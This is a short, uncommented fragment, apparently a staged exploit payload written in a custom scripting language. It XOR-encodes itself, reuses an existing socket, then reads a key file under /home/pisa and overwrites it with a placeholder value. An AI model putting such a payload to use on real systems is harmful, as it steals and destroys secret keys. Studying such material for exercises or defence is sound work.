scramble(mode="xor_backward_direct_dword") {
	#find_socket()
	get_socket(from="4")
	next_stage_tritium() {
		read_file_crypto(path="/home/pisa/key")
		write_file(path="/home/pisa/key", content=$E_OVERWRITE_KEY)
		exit()
	}
}
